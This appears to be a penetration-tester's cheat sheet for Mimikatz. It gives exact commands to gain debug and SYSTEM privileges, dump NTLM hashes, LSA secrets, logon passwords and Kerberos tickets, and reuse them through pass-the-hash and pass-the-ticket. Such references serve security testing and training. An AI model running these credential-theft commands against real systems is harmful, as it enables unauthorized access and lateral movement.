Mimikatz is a tool for dumping and using cached credentials on a compromised machine. High integrity or SYSTEM privileges required for most commands.
Usage
Acquiring Privilege
privilege::debug(try to enable SeDebugPrivilege; needed for elevation)token::elevate(try to elevate from high integrity to SYSTEM, if not already)
Dumping Credentials
lsadump::sam(dump cached NTLM hashes from LSASS; local users only)lsadump::lsa [ /patch | /inject ](dump LSA hashes, use patch on a workstation to dump NT hashes and inject on a DC to dump additional keys; patch refers to memory patching, see this article)sekurlsa::logonpasswords(dump all logged on users’ password hash, including remote users’)- If LSASS Protection is enabled, install the mimidrv.sys file as a service.
sekurlsa::msv(dumps local and domain user cached hashes)kerberos::list /export(dump Kerberos tickets)sekurlsa::tickets /export(dump cached tickets; in the output, “TGT” means ticket-granting ticket, “TGS” means ticket-granting service-ticket)sekurlsa::ekeys(dumps cached encryption keys for Kerberos authentication; debug required)
Using Credentials
sekurlsa::pth(pass-the-hash)- Format:
sekurlsa::pth /user:DOMAIN_USER /domain:DOMAIN /ntlm:NTLM_HASH /run:COMMAND - Run with unelevated privileges (use
token::revert). pass-the-hash with an elevated token does not work.
- Format:
kerberos::ptt TICKET.kirbi(inject ticket into memory; elevated privilege not necessary)
Miscellaneous
kerberos::purge(get rid of tickets in the current session)